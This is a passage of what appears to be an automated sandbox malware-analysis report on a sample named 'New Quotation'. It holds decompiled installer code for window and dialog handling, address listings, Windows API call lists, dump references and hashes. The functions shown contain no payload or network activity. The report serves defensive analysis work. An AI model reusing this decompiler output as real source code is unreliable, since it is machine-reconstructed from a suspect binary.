						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									L28:
									return E00404500(_a8, _t122, _a16);
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136) {
							_t146 =  *0x433ed8 - _t136; // 0x10442
							if(_t146 != 0) {
								ShowWindow(_t127, 0xa); // executed
								 *0x42f268 = 1;
							}
						}
						goto L63;
					}
					asm("sbb eax, eax");
					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
						goto L28;
					} else {
						ShowWindow(_t127, 4);
						goto L8;
					}
				}
			}
































                                                                                                                                                                                          0x00403fa5
                                                                                                                                                                                          0x00403fac
                                                                                                                                                                                          0x00404113
                                                                                                                                                                                          0x00404117
                                                                                                                                                                                          0x0040411b
                                                                                                                                                                                          0x0040411d
                                                                                                                                                                                          0x00404122
                                                                                                                                                                                          0x0040412d
                                                                                                                                                                                          0x00404138
                                                                                                                                                                                          0x0040413d
                                                                                                                                                                                          0x0040413f
                                                                                                                                                                                          0x00404141
                                                                                                                                                                                          0x00404144
                                                                                                                                                                                          0x00404149
                                                                                                                                                                                          0x00404157
                                                                                                                                                                                          0x00404164
                                                                                                                                                                                          0x0040416b
                                                                                                                                                                                          0x0040416b
                                                                                                                                                                                          0x0040416c
                                                                                                                                                                                          0x0040416c
                                                                                                                                                                                          0x00404171
                                                                                                                                                                                          0x00404177
                                                                                                                                                                                          0x0040417e
                                                                                                                                                                                          0x00404184
                                                                                                                                                                                          0x00404186
                                                                                                                                                                                          0x004041c6
                                                                                                                                                                                          0x004041cb
                                                                                                                                                                                          0x004041d0
                                                                                                                                                                                          0x004041d0
                                                                                                                                                                                          0x004041d5
                                                                                                                                                                                          0x004041de
                                                                                                                                                                                          0x004041e0
                                                                                                                                                                                          0x004041e5
                                                                                                                                                                                          0x004041eb
                                                                                                                                                                                          0x004041ef
                                                                                                                                                                                          0x004041ef
                                                                                                                                                                                          0x004041f4
                                                                                                                                                                                          0x004041fa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404205
                                                                                                                                                                                          0x0040420b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404214
                                                                                                                                                                                          0x0040421c
                                                                                                                                                                                          0x00404221
                                                                                                                                                                                          0x00404224
                                                                                                                                                                                          0x0040422a
                                                                                                                                                                                          0x0040422f
                                                                                                                                                                                          0x00404232
                                                                                                                                                                                          0x00404238
                                                                                                                                                                                          0x0040423d
                                                                                                                                                                                          0x00404240
                                                                                                                                                                                          0x00404246
                                                                                                                                                                                          0x0040424e
                                                                                                                                                                                          0x00404254
                                                                                                                                                                                          0x0040425a
                                                                                                                                                                                          0x0040425e
                                                                                                                                                                                          0x00404265
                                                                                                                                                                                          0x00404265
                                                                                                                                                                                          0x00404265
                                                                                                                                                                                          0x0040426f
                                                                                                                                                                                          0x00404281
                                                                                                                                                                                          0x0040428d
                                                                                                                                                                                          0x00404292
                                                                                                                                                                                          0x0040429c
                                                                                                                                                                                          0x004042a2
                                                                                                                                                                                          0x004042a4
                                                                                                                                                                                          0x004042a9
                                                                                                                                                                                          0x004042a6
                                                                                                                                                                                          0x004042a6
                                                                                                                                                                                          0x004042a6
                                                                                                                                                                                          0x004042b9
                                                                                                                                                                                          0x004042d1
                                                                                                                                                                                          0x004042d3
                                                                                                                                                                                          0x004042d9
                                                                                                                                                                                          0x004042ee
                                                                                                                                                                                          0x004042db
                                                                                                                                                                                          0x004042e4
                                                                                                                                                                                          0x004042e6
                                                                                                                                                                                          0x004042e6
                                                                                                                                                                                          0x004042f4
                                                                                                                                                                                          0x00404305
                                                                                                                                                                                          0x0040431b
                                                                                                                                                                                          0x00404322
                                                                                                                                                                                          0x00404328
                                                                                                                                                                                          0x0040432c
                                                                                                                                                                                          0x00404331
                                                                                                                                                                                          0x00404333
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404339
                                                                                                                                                                                          0x00404339
                                                                                                                                                                                          0x0040433b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404341
                                                                                                                                                                                          0x00404345
                                                                                                                                                                                          0x0040436a
                                                                                                                                                                                          0x00404370
                                                                                                                                                                                          0x00404376
                                                                                                                                                                                          0x00404378
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040439e
                                                                                                                                                                                          0x004043a4
                                                                                                                                                                                          0x004043a6
                                                                                                                                                                                          0x004043ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004043b1
                                                                                                                                                                                          0x004043b4
                                                                                                                                                                                          0x004043b7
                                                                                                                                                                                          0x004043ce
                                                                                                                                                                                          0x004043da
                                                                                                                                                                                          0x004043f3
                                                                                                                                                                                          0x004043f9
                                                                                                                                                                                          0x004043fd
                                                                                                                                                                                          0x00404402
                                                                                                                                                                                          0x00404408
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404412
                                                                                                                                                                                          0x0040441d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040441d
                                                                                                                                                                                          0x00404347
                                                                                                                                                                                          0x0040434d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404353
                                                                                                                                                                                          0x00404359
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040435f
                                                                                                                                                                                          0x00404333
                                                                                                                                                                                          0x0040442a
                                                                                                                                                                                          0x00404436
                                                                                                                                                                                          0x0040443d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404188
                                                                                                                                                                                          0x00404188
                                                                                                                                                                                          0x0040418b
                                                                                                                                                                                          0x004041be
                                                                                                                                                                                          0x004041be
                                                                                                                                                                                          0x004041c0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004041c0
                                                                                                                                                                                          0x0040418d
                                                                                                                                                                                          0x00404191
                                                                                                                                                                                          0x00404196
                                                                                                                                                                                          0x00404198
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004041a8
                                                                                                                                                                                          0x004041b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004041b6
                                                                                                                                                                                          0x00403fbe
                                                                                                                                                                                          0x00403fbe
                                                                                                                                                                                          0x00403fc2
                                                                                                                                                                                          0x00403fc7
                                                                                                                                                                                          0x00403fd6
                                                                                                                                                                                          0x00403fd6
                                                                                                                                                                                          0x00403fdc
                                                                                                                                                                                          0x00403fe3
                                                                                                                                                                                          0x00404027
                                                                                                                                                                                          0x0040402d
                                                                                                                                                                                          0x00404046
                                                                                                                                                                                          0x00404049
                                                                                                                                                                                          0x0040405c
                                                                                                                                                                                          0x00404062
                                                                                                                                                                                          0x00404100
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404109
                                                                                                                                                                                          0x00404068
                                                                                                                                                                                          0x00404073
                                                                                                                                                                                          0x00404075
                                                                                                                                                                                          0x00404077
                                                                                                                                                                                          0x00404096
                                                                                                                                                                                          0x00404096
                                                                                                                                                                                          0x00404099
                                                                                                                                                                                          0x0040409e
                                                                                                                                                                                          0x004040a1
                                                                                                                                                                                          0x004040b1
                                                                                                                                                                                          0x004040b2
                                                                                                                                                                                          0x004040b4
                                                                                                                                                                                          0x004040ea
                                                                                                                                                                                          0x004040fa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004040fa
                                                                                                                                                                                          0x004040b6
                                                                                                                                                                                          0x004040bc
                                                                                                                                                                                          0x004040d5
                                                                                                                                                                                          0x004040da
                                                                                                                                                                                          0x004040dc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004040de
                                                                                                                                                                                          0x004040ca
                                                                                                                                                                                          0x004040ca
                                                                                                                                                                                          0x004040cc
                                                                                                                                                                                          0x004040cc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004040cc
                                                                                                                                                                                          0x004040bf
                                                                                                                                                                                          0x004040c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004040c4
                                                                                                                                                                                          0x004040a3
                                                                                                                                                                                          0x004040a9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004040ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004040ab
                                                                                                                                                                                          0x0040409b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040409b
                                                                                                                                                                                          0x00404081
                                                                                                                                                                                          0x00404088
                                                                                                                                                                                          0x0040408e
                                                                                                                                                                                          0x00404090
                                                                                                                                                                                          0x00404466
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404466
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404090
                                                                                                                                                                                          0x0040404e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404056
                                                                                                                                                                                          0x00404035
                                                                                                                                                                                          0x0040403b
                                                                                                                                                                                          0x00404443
                                                                                                                                                                                          0x00404449
                                                                                                                                                                                          0x0040444b
                                                                                                                                                                                          0x00404451
                                                                                                                                                                                          0x00404456
                                                                                                                                                                                          0x0040445c
                                                                                                                                                                                          0x0040445c
                                                                                                                                                                                          0x00404451
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404449
                                                                                                                                                                                          0x00403fea
                                                                                                                                                                                          0x00403ff6
                                                                                                                                                                                          0x00403fff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040401e
                                                                                                                                                                                          0x00404021
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404021
                                                                                                                                                                                          0x00403fff

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00404035
                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                                                                                          • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 121052019-0
                                                                                                                                                                                          • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                          • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 322 403cac-403cd4 call 40640b 319->322 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 322->320 328 403cd6-403cda 322->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 344 403df3-403df6 330->344 345 403dfb-403e06 call 403ec2 330->345 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 343 403d0a-403d14 GetFileAttributesW 340->343 347 403d16-403d18 343->347 348 403d1a-403d1b call 405e58 343->348 344->338 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 347->339 347->348 348->339 360 403e32-403e44 GetClassInfoW 354->360 361 403e28-403e2d call 40689a 354->361 359 403e95-403e97 355->359 362 403eb1-403eb3 call 40140b 359->362 363 403e99-403e9f 359->363 366 403e46-403e56 GetClassInfoW RegisterClassW 360->366 367 403e5c-403e7f DialogBoxParamW call 40140b 360->367 361->360 362->335 363->344 368 403ea5-403eac call 40140b 363->368 366->367 372 403e84-403e8d call 403b3c 367->372 368->344 372->338
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"3073" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"3073", _t76);
				} else {
					E00406484(L"3073",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t41 =  *0x433ee0; // 0x0
							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                                                                                          0x00403bf2
                                                                                                                                                                                          0x00403bfb
                                                                                                                                                                                          0x00403c02
                                                                                                                                                                                          0x00403c04
                                                                                                                                                                                          0x00403c18
                                                                                                                                                                                          0x00403c2a
                                                                                                                                                                                          0x00403c33
                                                                                                                                                                                          0x00403c3c
                                                                                                                                                                                          0x00403c43
                                                                                                                                                                                          0x00403c48
                                                                                                                                                                                          0x00403c4f
                                                                                                                                                                                          0x00403c62
                                                                                                                                                                                          0x00403c62
                                                                                                                                                                                          0x00403c6d
                                                                                                                                                                                          0x00403c06
                                                                                                                                                                                          0x00403c11
                                                                                                                                                                                          0x00403c11
                                                                                                                                                                                          0x00403c72
                                                                                                                                                                                          0x00403c7c
                                                                                                                                                                                          0x00403c85
                                                                                                                                                                                          0x00403c8a
                                                                                                                                                                                          0x00403c9b
                                                                                                                                                                                          0x00403d2d
                                                                                                                                                                                          0x00403d35
                                                                                                                                                                                          0x00403d3e
                                                                                                                                                                                          0x00403d3e
                                                                                                                                                                                          0x00403d54
                                                                                                                                                                                          0x00403d5a
                                                                                                                                                                                          0x00403d68
                                                                                                                                                                                          0x00403de9
                                                                                                                                                                                          0x00403df1
                                                                                                                                                                                          0x00403dfb
                                                                                                                                                                                          0x00403e00
                                                                                                                                                                                          0x00403e06
                                                                                                                                                                                          0x00403e90
                                                                                                                                                                                          0x00403e95
                                                                                                                                                                                          0x00403e97
                                                                                                                                                                                          0x00403eb3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403eb3
                                                                                                                                                                                          0x00403e99
                                                                                                                                                                                          0x00403e9f
                                                                                                                                                                                          0x00403ea7
                                                                                                                                                                                          0x00403ea7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403e9f
                                                                                                                                                                                          0x00403e14
                                                                                                                                                                                          0x00403e1f
                                                                                                                                                                                          0x00403e24
                                                                                                                                                                                          0x00403e26
                                                                                                                                                                                          0x00403e2d
                                                                                                                                                                                          0x00403e2d
                                                                                                                                                                                          0x00403e38
                                                                                                                                                                                          0x00403e40
                                                                                                                                                                                          0x00403e42
                                                                                                                                                                                          0x00403e44
                                                                                                                                                                                          0x00403e4d
                                                                                                                                                                                          0x00403e50
                                                                                                                                                                                          0x00403e56
                                                                                                                                                                                          0x00403e56
                                                                                                                                                                                          0x00403e5c
                                                                                                                                                                                          0x00403e75
                                                                                                                                                                                          0x00403e86
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403e8b
                                                                                                                                                                                          0x00403df3
                                                                                                                                                                                          0x00403df5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403d6a
                                                                                                                                                                                          0x00403d6a
                                                                                                                                                                                          0x00403d76
                                                                                                                                                                                          0x00403d80
                                                                                                                                                                                          0x00403d86
                                                                                                                                                                                          0x00403d8b
                                                                                                                                                                                          0x00403d9a
                                                                                                                                                                                          0x00403eb8
                                                                                                                                                                                          0x00403eb8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403eb8
                                                                                                                                                                                          0x00403da9
                                                                                                                                                                                          0x00403de4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403de4
                                                                                                                                                                                          0x00403ca1
                                                                                                                                                                                          0x00403ca1
                                                                                                                                                                                          0x00403ca4
                                                                                                                                                                                          0x00403ca6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403cb4
                                                                                                                                                                                          0x00403cc6
                                                                                                                                                                                          0x00403ccb
                                                                                                                                                                                          0x00403cd4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403cda
                                                                                                                                                                                          0x00403cdc
                                                                                                                                                                                          0x00403ce9
                                                                                                                                                                                          0x00403ce9
                                                                                                                                                                                          0x00403cf2
                                                                                                                                                                                          0x00403cf8
                                                                                                                                                                                          0x00403d20
                                                                                                                                                                                          0x00403d28
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403d0a
                                                                                                                                                                                          0x00403d0b
                                                                                                                                                                                          0x00403d14
                                                                                                                                                                                          0x00403d1a
                                                                                                                                                                                          0x00403d1b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403d1b
                                                                                                                                                                                          0x00403d16
                                                                                                                                                                                          0x00403d18
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403d18
                                                                                                                                                                                          0x00403cf8

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                            • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                          • lstrcatW.KERNEL32(3073,0042D268), ref: 00403C6D
                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,3073,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75363420), ref: 00403CED
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,3073,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                                                                                                                            • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
